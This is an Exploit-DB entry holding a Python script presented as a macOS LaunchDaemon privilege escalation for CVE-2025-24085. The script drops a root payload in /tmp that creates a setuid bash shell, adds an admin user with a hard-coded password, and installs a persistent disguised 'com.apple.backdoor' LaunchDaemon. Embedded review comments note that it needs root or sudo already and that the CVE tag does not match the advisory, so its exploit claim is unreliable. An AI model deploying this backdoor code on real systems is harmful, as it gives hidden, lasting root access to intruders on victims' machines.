macOS LaunchDaemon iOS 17.2 - Privilege Escalation

EDB-ID:

52316




Platform:

macOS

Date:

2025-06-05


#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This script writes a root payload shell script to /tmp and then creates or rewrites the
# /Library/LaunchDaemons/com.apple.securemonitor.plist LaunchDaemon so that launchd runs that payload
# as root. The payload drops a setuid copy of /bin/bash, creates an admin user with a hard-coded
# password, and installs a second LaunchDaemon (com.apple.backdoor) for persistent root access.
# NOTE (review): as written, the script needs write access to /Library/LaunchDaemons (root-owned)
# and invokes `sudo launchctl`, so it supplies no privilege-escalation primitive of its own; the
# "vulnerable LaunchDaemon plist configuration" it relies on is not demonstrated here. Per Apple's
# January 2025 advisory, CVE-2025-24085 describes a use-after-free in CoreMedia, not a launchd
# configuration issue, so the CVE tag above should be treated with caution. Read this as a
# post-exploitation / persistence script for an operator who already has root or sudo.

import os
import plistlib
import subprocess
import time
from pathlib import Path

# LaunchDaemon plist that is created or rewritten. /Library/LaunchDaemons is
# root-owned, so writing this path already requires root privileges.
LAUNCHD_PLIST: str = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
# Payload dropped at a fixed name in world-writable /tmp; launchd later runs it
# as root, so any local user able to replace or pre-create this file first
# gets code execution as root as well.
PAYLOAD_SCRIPT: str = "/tmp/.macroot_payload.sh"

def create_payload():
    print("[+] Creating root payload script...")
    payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash

# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin

# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog

# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.backdoor</string>
  <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
    with open(PAYLOAD_SCRIPT, "w") as f:
        f.write(payload)
    os.chmod(PAYLOAD_SCRIPT, 0o755)

def hijack_launchdaemon():
    print("[+] Hijacking LaunchDaemon plist...")
    if not Path(LAUNCHD_PLIST).exists():
        # create a fake one
        print("[*] Creating fake LaunchDaemon plist for exploitation...")
        plist_data = {
            'Label': 'com.apple.securemonitor',
            'ProgramArguments': [PAYLOAD_SCRIPT],
            'RunAtLoad': True,
        }
        with open(LAUNCHD_PLIST, "wb") as f:
            plistlib.dump(plist_data, f)
    else:
        # hijack existing one
        with open(LAUNCHD_PLIST, 'rb') as f:
            plist = plistlib.load(f)
        plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
        plist['RunAtLoad'] = True
        with open(LAUNCHD_PLIST, 'wb') as f:
            plistlib.dump(plist, f)

    os.system(f"chmod 644 {LAUNCHD_PLIST}")
    os.system(f"chown root:wheel {LAUNCHD_PLIST}")

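def trigger_payload(path: str | None = None) -> bool:
    """Ask launchd to load the hijacked plist now instead of waiting for a reboot.

    Runs ``sudo launchctl load -w <path>``. This needs sudo rights, so — like
    the rest of the script — it is not an escalation step. ``launchctl load``
    is the legacy interface; ``launchctl bootstrap system <plist>`` is the
    modern equivalent.

    Args:
        path: plist to load. Defaults to ``LAUNCHD_PLIST``.

    Returns:
        True when launchctl exited 0, False otherwise (non-zero exit, or sudo /
        launchctl not present). The original printed "Done" unconditionally,
        even when the load had failed.
    """
    if path is None:
        path = LAUNCHD_PLIST
    print("[+] Triggering LaunchDaemon manually...")
    # argv list rather than a shell string: the path is passed verbatim and
    # never re-parsed by /bin/sh.
    try:
        result = subprocess.run(["sudo", "launchctl", "load", "-w", path], check=False)
    except OSError as exc:  # sudo or launchctl missing
        print(f"[!] could not run launchctl: {exc}")
        return False
    if result.returncode != 0:
        print(f"[!] launchctl exited with status {result.returncode}")
        return False
    print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
    return True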

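def main() -> None:
    """Drop the payload, rewrite the LaunchDaemon plist and print how to trigger it.

    Returns early when already running as root. When not root, the plist write
    inside ``hijack_launchdaemon`` fails with PermissionError because
    /Library/LaunchDaemons is root-owned; the original let that surface as a
    traceback, which hid the real situation — this script has no primitive of
    its own for getting past that check.
    """
    if os.geteuid() == 0:
        print("[!] You are already root. No need to exploit.")
        return
    create_payload()
    try:
        hijack_launchdaemon()
    except PermissionError as exc:
        print(f"[!] Cannot write {LAUNCHD_PLIST}: {exc}")
        print("    /Library/LaunchDaemons is root-owned; this script needs a pre-existing way to write there.")
        return
    print("[+] Exploit completed. Reboot or run manually:")
    print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
    print("    Then run: /tmp/.rootbash -p")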

# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()